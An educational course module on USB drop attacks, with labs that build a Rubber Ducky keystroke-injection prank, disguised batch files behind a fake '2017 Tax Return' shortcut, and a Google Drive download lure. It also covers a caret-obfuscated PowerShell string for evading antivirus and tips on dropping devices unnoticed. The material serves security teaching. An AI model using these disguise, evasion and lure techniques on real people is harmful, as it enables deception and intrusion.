Look What I Found! Uh Oh...

USB Drop Attack

Prerequisites
To participate in this course, you will need the following:
● A standard USB flash drive of any size
● A USB device that functions as a Human Interface Device, preferably a USB Rubber
Ducky sold by Hak5 (​https://shop.hak5.org/​). You can use other devices like a Maldunio
sold by Maltronics, but the lab will be using the USB Rubber Ducky
(​https://maltronics.com/​).
● A computer with internet access
● Text editing software, preferably Notepad++
● A free Gmail account
● A Windows 10 machine (labs will use attacks against Windows 10 OS)

Learning Objectives
● What is a USB Drop Attack
● Why these attacks are effective
● Types of USB drop attacks
○ USB Human Interface Drive (HID) Spoofing
○ Malicious Files/Code
○ Social Engineering Links
○ USB Kill
○ Zero Day
● Disguising attacks
● Reconnaissance
● Deployment
● Building the Attacks
○ USB Human Interface Drive (HID) Spoofing
■ Duckyscript
○ Malicious Files/Code
○ Social Engineering Links
● How to defend against USB Drop Attacks
○ Analyzing Devices
○ Red Team Deployments

What is a USB Drop Attack

A USB drop attack occurs when an attacker strategically places a USB device somewhere,
potentially containing malicious code, with the intention of someone taking it and plugging it into
a computer. This type of attack employs the use of social engineering. Social Engineering, in
terms of cyber security, is using deceptive means to manipulate individuals into divulging
information or performing some action. In this case, an attacker, or attackers, are attempting to
manipulate victims (targets) into taking a USB device and plugging it into their computer.
Depending the type of USB drop attack, an attacker(s) may further manipulate victims into
clicking on files loaded onto the USB device.

This type of attack has been used for years by everyone from lowly “script kiddies” all the way to
nation-state hacking groups. The reason it is seen so much is because it can be effective and
difficult to defend against. Depending on how this attack is deployed, it can be targeted to a
single individual or organization or randomly distributed. A famous example of this attack is the
Stuxnet worm. Stuxnet was a malicious worm designed to destroy centrifuges used in SCADA
system at specific nuclear plant in Iran. The attack was thought to have been distributed via
USB devices due to the SCADA system being disconnected from the internet for security
reasons. This worm had several versions found, some versions exploited several zero-day
vulnerabilities, including in the centrifuges’ program on Windows machines. It destroyed
approximately a fifth of the centrifuges within the plant. It has been thought that the worm was
developed and distributed jointly by the United States and Israel, although both countries have
denied this.

Why are these Attacks Effective

The reason this attack can be so effective is because it uses humans’ natural curiosity and/or
desire to help others against them. When there is a device laying around that has potentially
“juicy” information on it, humans cannot help themselves but to take these devices and see
what’s inside. An effective attacker leverages humans’ innate curiosity to get a victim to take a
USB device. Once a device is taken, the odds are good that the contents will be examined by
the victim. However, many skilled attackers will not simply hope that victims will click the right
file. Attackers will add enticing files or file name within the device to further play on those human
traits that made them pick up the device in the first place. Even when people are trained to spot
these attacks, they can still fall for them because it can be so enticing.

However, not all of the blame can be given to humans. The machines these devices get
plugged into don’t do much checking either. Some devices with Windows OS simply ask what
you want to do with the device. Once a file is clicked, it is up to the machines’ firewall and
installed antivirus to stop anything malicious. You can do a malware scan once the device is
inserted, but often times that requires forethought of the human controlling the machine. There
are few adequate countermeasures that machines take to stop strange USB devices that get
inserted.

Types of USB Drop Attacks

USB Human Interface Device (HID) Spoofing
Before talking about USB Human Interface Device (HID) spoofing, first we need to understand
what human interface devices are. HIDs are devices that attach to computers via the USB port,
or similar ports, that allows humans to input data or allows machines to provide output to
humans. Examples of HID devices include: keyboards, mice, headphones, microphone, ect.
HID spoofing, in terms of a USB drop attack, tricks a machine into thinking a keyboard is in use
by a human. When this device is plugged into a machine, it can then execute pre-programmed
keystroke on the machine.

This type of USB drop attack is very versatile because it can be used across different operating
system platforms including Windows, MacOS, and Linux. This attack cannot be used with every
USB device but instead requires specific microcontrollers that support keyboard emulation. A
microcontroller is essentially a tiny computer on a single integrated chip. There are a few
different HID devices that can be purchased and used after some setup. Two of the most
popular devices are the USB Rubber Ducky from Hak5 and the Malduino by Maltronics. HID
spoofing devices can also be made from arduino boards that are close to the size of a typical
flash drive. However, these devices require additional programming and hardware setup to get
these devices to look like typical flash drives. There are also a small number of certain flash
drives that can be converted into HID devices with some programming. These devices use its
own programming language called DuckyScript. DuckyScript is a simple scripting language that
can emulate anything a keyboard can do.

There are some drawbacks to using this type of device in a USB drop attack. Since this device
injects keystrokes, it may be possible for the victim to notice this if they are not properly hidden
and unplug the devices before completion. These devices must be plugged into the target
device for a predetermined time in order for the attack to be successful. If an alert victim notices
keystrokes or becomes inpatient that no storage is becoming visible after plugging it in, it may
be removed before the payload completes. This is why it is so important when an attacker uses
this device in an attack to make payloads that are not visible or briefly visible and completes
quickly.

Malicious Files/Code
Another type of USB drop attack is the use of malicious files loaded onto an everyday flash
drives. Once a victim opens a file containing the malicious code, the code activates. What these
malicious files can do is virtually endless, including downloading other malicious files from the
internet. These attackers are only limited by the attackers imagination and the machine’s
countermeasures such as antivirus.

Files Used in these attacks are usually given enticing names to get victims to click on them. A
very popular way to get people to click on malicious files is to play on victims’ lust by placing
potentially pornographic pictures on the flash drive. Attackers with less experience may not
know how to disguise files and depend on victims clicking them despite the obvious danger.
More experienced attackers find ways to disguise these files and make it harder to spot the
danger. For example, a malicious file can be hidden inside another file, such as an exe file
being placed inside a picture. This technique is know as steganography.
The advantage of using this version of attack versus HID spoofing is the code can run entirely
hidden from view if executed properly. Sometimes victims will have no idea there was an attack
if the code ran circumvents the malware protection on the machine. Another advantage is this
attack can be performed on any flash drive with enough storage. This allows attackers quick
and easy access to more accessible devices. A disadvantage of this attack is that some
malicious files can be stopped by the machine’s countermeasures like antivirus.

Social Engineering Links

This attack involves the use of malicious phishing links. In this attack, an attacker places
website links on the flash drive that directs the user to a phishing site or to malware. Typically,
these malicious links will direct users to websites set up by the attacker that attempt to harvest
the victim’s credentials, attempt to extort victims, download malicious files, or other attacks.
These phishing sites can masquerade as other sites such as email hosting sites like Gmail,
Yahoo, and others to trick users to input their credentials. Although this attack can be used with
HID spoofing devices by taking a victim to a phishing site with the keystroke commands, it is
more likely to be used on an everyday flash drive. There are a few disadvantages of this attack.
This attack is dependent on internet access and requires the victim's computer to be connected
to the internet. If the victim is not connected to the internet, the attack will fail. This attack
sometimes relies more heavily on the use of social engineering to trick gullible users into
clicking links and then performing the desired action on the phishing website.

USB Kill
This attack is the most destructive out of all USB drop attacks. When plugged in, the USB Kill
creates a power surge destroying the machine. The vast majority of devices are not protected
against this type of attack. USB ports in machines have two functions, they power the USB
devices and communicate with USB devices. What the USB kill does is it takes the power from
the machine’s USB power lines and stores the voltage. Once the voltage reaches a certain point
the devices then discharges that stored power through the USB data lines. The device will do
this continuously until the machine is destroyed or until it is unplugged. They have a few
different versions with adapters (Micro USB, USB-C, Lightning) to attach to other types of
devices like smartphones. Some come with an easy to spot emblem. However, some of these
devices are hard to spot because they sell an “anonymous” edition that has no markings to
indicate it is a USB Kill.

Zero Day
This attack takes advantage of an undiscovered vulnerability in the machine’s software. When
this category of attack is talked about, it almost always references the Stuxnet attack. Stuxnet
was a rare example that used several zero day vulnerabilities in its targeted attack. Many cyber
security experts will also call this a Zero Day Driver attack. This is because when machines
have external devices connected the driver software is installed, and there exist the possibility of
having malicious code attached to that driver software. Some cyber security experts do not
include this attack as its own category but instead place it with the malicious file/code category.
The logic of categorizing it appears to exist both ways making it the most ill defined category of
USB drop attacks.

Disguising Attacks
These attacks can use several different techniques to hide themselves or make them difficult to
spot. Attacks can not only be disguised in the perspective of the user but also the device. The
possibilities are endless, and it would take several hours to discuss them all. This section will
only highlight a few techniques.

As discussed previously, malicious code could be hidden inside other files. The classic example
is disguising an exe file in a picture file. Another way attacks can use steganography is to hide
passwords inside other files. If, for example, an attack needs to exfiltrate data via an email
script, they may pull the password hidden inside a harmless looking file. This would help protect
the password from being found by the victim. Another very popular method is to hide malicious
macros inside a doc, xls, pdf or other files. Macros are used to automate tasks but can be used
to run malicious code. From the outside, a document can look normal, but an attacker can plant
malicious code in a macro. Most modern programs like Microsoft Office disable macros by
default and have to be enabled by the user. This is only a small setback for most attackers
because many manipulate the victims into turning macros on.

Malicious files could also be placed directly on the flash drive and disguised. There are several
examples of this across operating systems. On Windows machines, there exists the ability to
make files and folders hidden. A malicious file could be hidden and then a visible link file made
of the malicious file. This visible link file can be further disguised by changing the icon and
giving it an enticing name. On MacOs or Linux based machines, malicious files can be given a
false extension with an extra space to hide the true file type. This is called “Space after
Filename”. Because of this extra space in the file extension name, the operating system with
ignore the extension name and runs it based on what the OS determines what the true file type
is. For example, a malicious file named “badfile.bin” is changed to “badfile.txt “ (note the extra
space at the end), the OS will run the file as a bin file instead of a txt file. A less sophisticated
technique, but still effective, is to add a fake extensions name before the real extension. For
example, an exe file named badfile.exe could be changed to badfile.txt.exe.

Many malicious files not only have to evade the users’ detection but also the devices malware
detection. Files that employ the before mentioned methods also have to avoid being caught by
the machine’s countermeasures or the attack can fail. Some methods attackers use is
obfuscating commands. For example, if an attacker launches a powershell window using a
Windows batch file with a command something like “p^O^w^e^R^S^he^L^L.e^x^e” instead of
“powershell.exe” may successfully avoid some antivirus programs’ detection.
 Reconnaissance and Deployment
Any good attacker will not only put great deal of thought and effort in the code and/or malicious
links on the device itself, but also in the deployment of the device. There are several things that
an attack will try to get a target to take a device and plug it into their machine. If an attacker
does a poor job in deploying the attack, it does not matter how much effort they put in the code
on the device if the target does not take it. Even if a target does take a device, the attacker also
has to get them to plug it in the target device.There are several things a seasoned attacker or
attackers with do to increase the odds their attacks with be successful. Planning the deployment
may be different depending on the type attack, the target or targets, or other factors. There are
several strategies that may or may not be used, greatly expanded on, or used in a different
orders depending on the attack operation. The time an attacker uses to research deployment
strategies are known as reconnaissance or recon for short. Recon, in terms of cyber security,
means to gather information on a target or targets. In a USB drop attack, an attacker can recon
victims and target machine in person and/or through a computer.

What to Look for During Reconnaissance

There are several things an attacker must know before deploying their attack. One of the first
things an attacker will do is to choose a target. Who is most likely to put in a strange USB
device? Does the machine have the information I need for the attack? If the attack is against a
single individual, then this step requires little thought. Then it is just a matter of getting them to
take it and plug it in. If the attack is against a large multinational organization, then it requires a
lot more planning. This could take some work to figure out what person or persons would be a
good target. Reconing the potential target machines is also very important. Is the machine
Windows, MacOS, or Linux based operating systems? How quickly does the machine or
machines operate? What kind of antivirus is installed? Is it protected by a 24/7 Security
Operations Center (SOC) that constantly monitors for attacks? Answering these questions
about the target machine or machines will ultimately shape the type of attack that is launched.
Attackers will also need to recon a place or places to leave a USB device. Where to place a
device depends on the scope of the attack. If the attack is against a single individual, they will
need to leave it somewhere where only that target will find it. If the attack is against many
people it may be easy to leave them in a general area to be discovered. Another important
factor to consider is risk of being caught when leaving the device. If the device is going to be left
in a public area, then the risk is low. If the device going to be placed on a target’s desk in a high
secure facility, then the risk is very high..

Deploying the Device(s)

Once an attacker has done all their recon work and tailor their attack, it is time to deploy the
device or devices. The way a device gets deployed depends on many factors. If it’s a wide open
area with no security measures, deployment can be easy. If it requires access to a secure
building that has high security, this stage will be difficult. A good rule of thumb is to not look
suspicious. If an attacker arrives at the drop location looking back and forth quickly and then
throws a device in front of them, people can grow suspicious. If, however, an attacker casually
walks to the drop area and nochanitly drops the device, most people would not even notice. The
key idea is to act like you belong, to blend into the people around you. If an attacker walks
around a fancy office building with ripped pants and a long beard, they will get noticed. If
instead, they walk around clean shaven and with a nice suit, no one may notice them.

There are several things an attacker will do to increase the chances of the target device being
taken.The attacker can put the device on a keyring with keys, put a label on it, or distress the
item to make it look used. This is really dependent on the situation but leaving a brand new
looking device all by itself may not work as well. For example, If the attack is against a company
with some trade secrets that could affect their profits if gotten out, an attacker could leave a
device labeled “confidential” just outside the building. Sometimes putting the device on a keyring
with keys could backfire. For example, the target may be an upper level management but
someone may end up turning the device into lost and found thinking someone lost their keys.
This is one of many reasons attackers typically deploy several devices. Many devices get taken
by the unintended person, get taken and never plugged in to the right machine, or never get
taken at all.

Building the Attacks

USB Rubber Ducky (HID) Spoofing Lab
Although there are several devices that can be used in an HID spoofing attack, I will limit my
demonstration to the USB Rubber Ducky that can be be found at ​https://shop.hak5.org/​. As
discussed previously, you can use other devices like the Maldunio from Maltronics or Arduino
boards that are similar sizes to a flash drives. I choose the USB Rubber Ducky because it is the
only device sold that comes with an enclosure that is made to look like a normal flash drive.

To follow along with this demonstration you will need the following:
● USB Rubber Ducky
● A computer with internet access
● A machine with Windows 10 OS (the attack will be against a Windows 10 machine)
● Notepad++ or another text editor

I prefer to use Notepad++ as my text editor because it is free, and you can install scripting
languages into the program. I will be performing my demonstrations with Notepad++. You can
acquire the program here: ​https://notepad-plus-plus.org/​. If you are using Linux or MacOS,
Sublime Text would be a good alternative, ​https://www.sublimetext.com/​. Installing the ducky
scripting language pack is not required but can be helpful when scripting. In order to install the
ducky script language pack into Notepad++, follow these steps:
1. Visit ​https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Downloads​ and download
the User Defined Language (UDL) for Notepad++
2. Unzip the folder
3. Open Notepad++ and navigate to “Languages” to the top menu
4. In the drop down box of “Languages”, select “Define your Language”
 5. A menu box should open with the title “User Defined Language”. Click on the “Import”
button near the top of the menu box.
6. Navigate to the unzipped folder downloaded in step one, and select
“userDefineLang.xml”
7. Once the xml file has been imported, a dialog box will pop up stating the import was
successful
8. After importing, close the “User Defined Language” menu then close the program
9. Reopen the program and navigate to “Languages” at the top menu. There should be
new scripting language called “DuckyScript”. You can now select it when scripting with
DuckyScript.

After getting your text editor ready to go, let’s learn how to use the USB Rubber Ducky. The
Rubber Ducky contains a removable outer case that resembles a flash drive. On the board
itself, there is a slot for a micro SD storage card, an LED indicator light, a reply button, and a
type A plug (USB). The device also comes with a micro SD card and a micro SD to USB
adapter. The scripts you write are saved on the micro SD card, and then the micro SD card is
placed into the Rubber Ducky’s micro SD storage slot. Only one script at a time can be placed
on the root of the micro SD card and used. Other scripts can be stored in a folder on the micro
SD card and used later if they are moved to the root and the other script is removed. For scripts
to run they must be encoded and saved as inject.bin. In this course, we will be using
https://ducktoolkit.com/encoder/​ to encode payloads after writing them.

DuckyScript
If you have no experience with any kind of scripting language, DuckyScript is a great place to
start. With practice, you can easily master the language. Each command of this scripting
language has its own line, meaning each line should start with a command. The commands are
written in all caps, which help distinguish it from the rest of the line. Let’s explore what
commands you can use and what each do. The following list can also be found at this website:
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript​. Here is a list of the
commands that can be used:
● DEFAULT_DELAY or DEFAULTDELAY: defines (in milliseconds) how long to wait
before executing the next command. This is an optional command. For example,
DEFAULTDELAY 100.
● DELAY: Creates a pause in the script before continuing to the next command (in
milliseconds). Can range from 1 to 10000 milliseconds.
● REM: Allows commenting and is not processed in the script.
● STRING: This command is used when text is needed to be entered. Text is entered
exactly as is following this command.
● GUI or WINDOWS: This enters the Windows key on a Windows machine.
● APP or MENU: This imitates the context menu key also known as the App key or menu
key.
 ● SHIFT: Is used to select text and navigating through fields. Can be used in conjunction
with DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW,
DOWNARROW, LEFTARROW, RIGHTARROW, and TAB.
● DELETE: Imitates the delete key.
● HOME: Imitates the home key.
● INSERT: Imitates the insert key.
● PAGEUP: Imitates the pageup key.
● PAGEDOWN: Imitates the pagedown key.
● UPARROW or UP: Imitates the up arrow key.
● DOWNARROW or DOWN: Imitates the down arrow key.
● LEFTARROW or LEFT: Imitates the left arrow key.
● RIGHTARROW or RIGHT: Imitates the right arrow key.
● TAB: Imitates the tab key.
● ALT: Imitates the alt key. Can be used in conjunction with END, ESC, ESCAPE, F1, F2,
F3, F4, F5, F6, F7, F8, F9, F10, F11,F12, Single Characters, SPACE, and TAB.
● CONTROL or CTRL: Imitates the ctrl key. Can be used in conjunction with BREAK,
PAUSE, F1, F2, F3, F4, F5, F6, F7, F8, F9, F10, F11,F12, ESCAPE, ESC, and Single
Characters.
● BREAK or PAUSE: Imitates the pause/break key.
● CAPSLOCK: Imitates the capslock key.
● END: Imitates the end key.
● ESC or ESCAPE: Imitates the esc key.
● INSERT: Imitates the insert key.
● NUMLOCK: Imitates the numlock key.
● PRINTSCREEN: Imitates the printscreen key.
● SCROLLLOCK: Imitates the scroll lock key.
● SPACE: Imitates the space lock key.
● ENTER: Imitates the enter key.
● REPEAT: Repeats the previous command. For example, “REPEAT 10” will repeat the
previous command ten times.

When writing a script with DuckyScript it can take several revisions of the code to get it working
properly. Before deployment, it is imperative that the script is perfected on a practice machine.
There are several things to keep in mind when writing a script. First, delays are very important
when writing a script. If the delays are too short, commands can execute too quickly before they
are expected to. This can cause the script to become worthless after the incorrect delay. If
delays are made too slowly, a user could unplug the device before the script completes. Another
thing to keep in mind is that every machine is different. Some machines are lightning quick,
others are slow as a turtle. It is important to keep in mind of how quick or slow the target
machine is and tailor the script accordingly. This involves some reconing of the target device. If
this is not possible, it is a good idea to make the script to execute at the speed most machines
can handle. Remember, anything you can do with a keyboard you can do with this attack. It just
takes some knowledge and patience when building the script.
If you would like to see example payloads visit this website:
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads​. Some of the payloads on this
site are out of date and need some tweaking to get working properly. However, this is a great
place to get started if you want to learn DuckyScript.

HID Spoofing Lab

Now that you know the basics of DuckyScript, I will show you an example. In this example, I will
be writing a script to attack a Windows 10 machine. This will be a simple script that ​will minimize
all windows, take a screenshot of the desktop, disable the desktop icons, save the screenshot in
current user’s folder, and sets as wallpaper as the screenshot. Although not exactly malicious,
this script is rather annoying for victims. In the script, there will be longer delays in order to work
on most devices. The script can be tweaked to work quicker or slower by changing the delays.
You will need to following in order to participate:
● A USB Rubber Ducky
● A text editor like Notepad++

The following are the steps to complete the lab:

1. Open Notepad++ (or the text editing software you choose to use) and start a new file
2. On the top menu click on languages, then select DuckyScript on the drop down menu
3. Enter the following code:
DELAY 5000
GUI d
DELAY 200
PRINTSCREEN
DELAY 200
MENU
DELAY 200
STRING v
DELAY 200
STRING d
GUI r
DELAY 200
STRING mspaint
ENTER
DELAY 1000
CTRL v
DELAY 200
ALT f
STRING s
DELAY 500
STRING %userprofile%\prankwallpaper.jpg
ENTER
 DELAY 200
ALT f
DELAY 200
STRING b
DELAY 200
ALT F4
DELAY 200
GUI d
4. Once the code has been entered, save the text file
5. Open your browser and navigate to ​https://ducktoolkit.com/encoder/
6. Copy the code in the text file and paste it into the Duck Code text box on the website
7. Then on the right, under “language”, select the language that matches the machine this
script will be used against. (In this case, United States will be used)
8. Once selected, click on “Generate Script”. If there are any command errors in the code,
the website should let you know.
9. After generating the script, there should be an “Inject.bin” button. Click the “Inject.bin”
button. The script will start downloading.
10. After downloading, insert the microSD card into the USB to microSD adapter. Then plug
it into your machine.
11. Find the “Inject.bin” script file that was downloaded in step 9, and place in the root of the
microSD card.
12. Eject the USB to microSD adapter.
13. Remove the cover from the USB Rubber Ducky and place the microSD card into the
microSD slot on the HID device.
14. Put the cover back together with the metal piece. The device should be ready to go.

Malicious File/Code Lab

In this lab, I will be showing you how to perform this attack with the visible link file method
(discussed earlier) on a Windows 10 machine. You will need to following in order to participate:
● A standard USB flash drive
● A computer internet access
● A machine with Windows 10 OS (the attack will be against a Windows 10 machine)
● A text editor like Notepad++

In this attack, I will be creating a batch file (.bat) that will display messages in the command
prompt that files are being stolen. In reality, nothing is being stolen. There are only messages
being displayed. A batch file is a Windows script file that run with the command prompt. After
creating the batch file, I will hide the file and create a visible link to that file and disguise it.

The following are the steps to complete this lab:

1. Open Notepad++ (or the text editing software you choose to use) and start a new file
2. Enter the following code into the text editor:
@echo Virus Activated! Hacking in progress...
 @echo off
TIMEOUT /T 2 /NOBREAK >nul
echo Looking for files to steal. Please wait...
TIMEOUT /T 2 /NOBREAK >nul
cd /d C:
dir
TIMEOUT /T 5 /NOBREAK >nul
cls
echo Sensitive files found!
TIMEOUT /T 5 /NOBREAK >nul
echo Exporting files to hackers. Please wait...
TIMEOUT /T 5 /NOBREAK >nul
echo Success!
TIMEOUT /T 5 /NOBREAK >nul
echo Thank you for the personal data!
TIMEOUT /T 20 /NOBREAK >nul
exit
3. Save the text as “TemptingLookingFile.bat”
4. Plug in your USB flash drive into your machine.
5. Copy the TemptingLookingFile.bat file onto the flash drive.
6. After copying the file, right click the file on the flash drive and select “Create Shortcut”. A
shortcut file to the TemptingLookingFile.bat named “TemptingLookingFile.bat - Shortcut”
should appear on the flash drive.
7. Rename the shortcut file from “TemptingLookingFile.bat - Shortcut” to “2017 Tax Return”
8. Right Click on the original TemptingLookingFile.bat and select “Properties”.
9. A pop up window should appear named “TemptingLookingFile.bat Properties”
10. On the first tab under “General”, navigate near the bottom to Attributes. Check the next
to “Hidden”. Select “OK” on the bottom of the window. The original bat file should now be
hidden from view and the shortcut file should be the only one remaining.
11. Right click on the shortcut file named “2017 Tax Return” and select properties in the
menu that appears.
12. Once in the “Properties” menu, select “Change Icon…”

13. Select the following icon: , or an icon that is similar. Then select “OK”, then “OK”
again.

Social Engineering Links Lab

In this lab, I will be using a similar batch file used in the previous lab. The difference in this
attack is that I will be placing a link file on a flash drive that downloads the batch file from
Google Drive. I will attach a separate text file on the flash drive to attempt to trick a victim to run
the downloaded file. You will need to following in order to participate:
● A standard USB flash drive
 ● A computer with internet access
● A machine with Windows OS (the attack will be against a Windows 10 machine)
● A text editor like Notepad++
● A Google Drive to upload the file to (signing up is free)

The following are the steps to complete this lab:

1. Open Notepad++ (or the text editing software you choose to use) and start a new file
2. Enter the following code into the text editor:
@echo Why are you trying to look at my credit card info? Now you will pay!
@echo off
TIMEOUT /T 2 /NOBREAK >nul
echo Virus Activated! Hacking in progress...
TIMEOUT /T 2 /NOBREAK >nul
echo Looking for financial info to steal. Please wait...
TIMEOUT /T 2 /NOBREAK >nul
cd /d C:
dir
TIMEOUT /T 5 /NOBREAK >nul
cls
echo Sensitive financial files found!
TIMEOUT /T 5 /NOBREAK >nul
echo Exporting files to hackers. Please wait...
TIMEOUT /T 2 /NOBREAK >nul
echo Success! Spending spree in progress...
TIMEOUT /T 28 /NOBREAK >nul
echo Thank you!
TIMEOUT /T 20 /NOBREAK >nul
exit
3. Save the text as “CreditCardInfo.bat”
4. Open your browser and create a free Gmail account at gmail.com
5. Once the account is created, navigate to drive.google.com
6. Once there, upload the CreditCardInfo.bat file to Google Drive.
7. Once the file is uploaded, right click the file in Google Drive and select “Get Shareable
Link”
8. Copy the shareable link. The link to the Google Drive file will look something like this:
https://drive.google.com/open?id=RandomText
9. To make the file immediately downloadable, delete “open?” and insert
“uc?export=download&” in its place. For example, change
https://drive.google.com/open?id=RandomText to
https://drive.google.com//uc?export=download&id=RandomText
10. Copy the new downloadable link in the browser of your choice. Once there, to the left of
the web address, click and drag the link to the flash drive.
11. Rename the file to “CreditCardInfo”
 12. Create a text file named “HowToDisplayCCInfo.txt”. Enter the following text into the text
file:
“Note to self:
To view credit card information click on the CreditCardInfo file, wait for the file to
download, then run the file to see the credit card info. Remember to keep it secret from
others!”
13. Once both files are on the flash drive the attack is ready to deploy.

How to Defend Against USB Drop Attacks

Unfortunately, these sort of attacks are difficult to defend against, but there are a few things that
can be done to protect yourself. The best thing that you can do to protect yourself is don’t plug
in strange USB devices. It may be tempting to see what’s inside because you’re curious, but
don’t. It is not worth risking getting something like a keylogger installed, getting valuable
information stolen, malware, your computer destroyed, or other damaging things. Attackers put
a lot of thought and effect into these attacks and may be more sophisticated than you can
imagine. Some organizations have policies to not allow USB devices. They may enforce them
by physically disabling USB ports on company issued devices or by placing items in the USB
ports to prevent devices being inserted. Although, many devices used to block ports can be
easily removed.

Analyzing Devices
If you have experience in malware analysts, you could plug the device in a machine with no
network access and personal information that is solely for analyzing malware. In the event the
USB is a USB Kill, it may be a good idea to have a machine you don’t mind if it gets destroyed.
If you choose to do this, you must be very careful not to let any information on the USB device
go onto other machines or let the machine you are examining the USB device on become
connected to the local network (LAN) or internet (WAN). The USB Devices may have attacks
that report back, fingerprint your network, or spread to other machines. If you have a machine
that you can examine USB devices on, it could be fun to explore devices used in attacks.
However, ensure to follow previous advice and wipe the machine after you have examined the
device. If you don’t know what you are doing, it may not be a good idea to try this. Another
option is to get this device to a cyber security professional who knows what they are doing.
Giving a device to a family member who is “good with computers” may not be ideal because
they may not know what they are doing and fall for the attack.

Red Team Deployments

Some organizations may decided to conduct their own USB drop attacks with the purpose of
educating employees. Typically in these deployments, harmless code is used that reports back
to the security team once someone uses the device. This is great way to educate employees
about the dangers of strange USB devices and to get them to stay vigilant and report potential
attacks. In my experience, employees can be lectured at all day about the dangers, but many
will never care to listen to take the advice. It’s not until personal experiences of an attack will
someone change their behavior. If your organization has the means to conduct red team attacks
like this, I highly encourage it. It not only makes your employees more educated and vigilant, but
it can also be a valuable experience for everyone involved.

Summary
● What is a USB Drop Attack
○ What the attacks are
○ Social Engineering
○ Popular attack used by Nation-States and “script kiddies”
○ Stuxnet
● Why these attacks are effective
○ Leverages human curiosity
○ Machines don’t check
● Types of USB drop attacks
○ USB Human Interface Drive (HID) Spoofing
■ Acts as a keyboard
■ Only works with certain types of devices
■ Has its own scripting language, DuckyScript
■ Versatile attack that works across platforms
■ Must be completed quickly to be effective
○ Malicious Files/Code
■ Uses everyday flash drives
■ Possibilities are endless
■ Can run entirely hidden if done correctly
■ Can be caught by antivirus
○ Social Engineering Links
■ Uses malicious html/htm links
■ Can be phishing sites to harvest credentials, extort, and/or download
malware
■ Used most on everyday flash drive but can also use HID spoofing devices
■ Must be connected to the internet
○ USB Kill
■ Destroys machines with power surge
■ Most machines aren’t protected
■ Comes with adapters and versions without logo
○ Zero Day
■ Stuxnet
■ Zero Day Driver
■ Disagreement
● Disguising attacks
○ Steganography
○ Link file to hidden file in Windows OS
 ○ False extension in MacOS and Linux
○ Obfuscating commands to avoid antivirus detection
● Reconnaissance and Deployment
○ What to look for during Recon
■ Researching the victim(s)
■ Researching the target machine(s)
■ Where to leave device
○ Deploying the Device(s)
■ Blending in
■ Making Devices more tempting
● Building the Attacks
○ USB Human Interface Drive (HID) Spoofing
■ DuckyScript
■ Example Windows 10 attack
○ Malicious Files/Code
■ Example Windows 10 attack
○ Social Engineering Links
■ Example Windows 10 attack
● How to defend against USB Drop Attacks
○ Don’t plug it in
○ Block USB ports
○ Disable USB ports
○ Analyzing Devices
■ Use no connection to LAN or WAN and no personal info
■ Wipe it after
○ Red Team Deployments
■ Educating employees

Quiz
1. Which of the following is NOT a type of USB Drop Attack?
a. Malicious File/Code
b. Human Interface Drive Spoofing
c. Steganography
d. USB Kill
2. What is the name of the computer malware that targeted and destroyed an Iranian
nuclear plant’s centrifuges?
a. Stuffnecks
b. WannaCry
c. Stuxnet
d. ILOVEYOU
3. What is the name of the scripting language used in the Human Interface Drive Spoofing
devices?
 a. QuackyScript
b. GooseyScript
c. ChickenScript
d. DuckyScript
4. Which method is NOT a way of disguising a malicious file/code attack?
a. Using plain text commands
b. Steganography
c. Adding a link file to a hidden file
d. Adding a false extension name
5. Which of the following should be done when performing reconnaissance for a USB drop
attack?
a. Researching the target victim(s)
b. Researching the target machine(s)
c. Researching the drop sites
d. All of the above
6. Which of the following is a way to protect yourself from a USB drop attack?
a. Plug in the device into your personal machine without internet connection to
examine it
b. Plug in the device into a friend’s machine without internet connection to examine
it
c. Don’t plug in any unknown USB devices
d. Don’t plug in any unknown USB devices unless it’s a manufacturer you recognize
7. Why are USB Drop Attacks so effective?
a. Human curiosity
b. Lack of machine security against unknown USB devices
c. Both A and B
d. None of the above
8. Which of the following is a purpose of a read team deployment of a USB Drop Attack?
a. To keep employees vigilant of attacks
b. To educate employees on how these attacks work
c. To improve compliance of no USB device policies
d. All of the above

Answer Key: 1.C 2.C 3.D 4.A 5.D 6.C 7.C 8. D

Terms
Batch File​: Script file used in Windows operating systems to carry out command-line interpreter
commands
Human Interface Device (HID)​: Devices that attach to computers via the USB port, or similar
ports, that allows humans to input data or allows machines to provide output to humans
Keystroke​: Press or stroke of a key on a keyboard or other device
Local Area Network (LAN)​: Group of machines that share a common line of communication
within a limited area
Macro​: A script within a program that automates tasks
Malware​: Any software that is intended to cause damage to machines or networks
Microcontrollers​: A small computer that has a single integrated circuit.
Nation-State Hacker Group​: Group of hackers that is supported by nation-states that are usually
highly trained and skilled
Obfuscation​: The creation of machine code that is difficult for humans to understand and can
also be used to circumvent malware detection.
Phishing​: Attempt to steal sensitive information by posing as a trustworthy source
Reconnaissance or Recon​: To obtain information about a victim or target by exploring physically
or virtually
Red Team​: Groups that play the role of an adversary but are in reality apart of the security
team. They attempt to exploit weaknesses in networks, machines, buildings, humans, ect.
Root​: The first top-most directory on a storage device
Security Operations Center (SOC)​: Room or building that contains the cyber security team
responsible for analyzing and monitoring for cyber attacks.
Supervisory Control and Data Acquisition (SCADA):​ Computer system that controls and
monitors systems used in facilities like nuclear plants, oil and gas refineries, water waste
facilities, ect. These systems are typically disconnected from the internet.
Script Kiddie​: An unskilled person who uses existing code/attacks made by others to attack
machines, networks, and/or websites.
Social Engineering​: Using deceptive means to manipulate individuals into divulging information
or performing some action.
Steganography​: The practice of hiding a file inside another file.
Wide Area Network (WAN)​: Interconnected network that extends over a large geographic area.
For example, the internet.
Wiping​: To delete all the data from a storage device.
Worm​: A type of malware that is self replicating
Zero-Day​: An unknown exploit, except to an attacker, that takes advantage of a vulnerability in
software or hardware that has no patch available.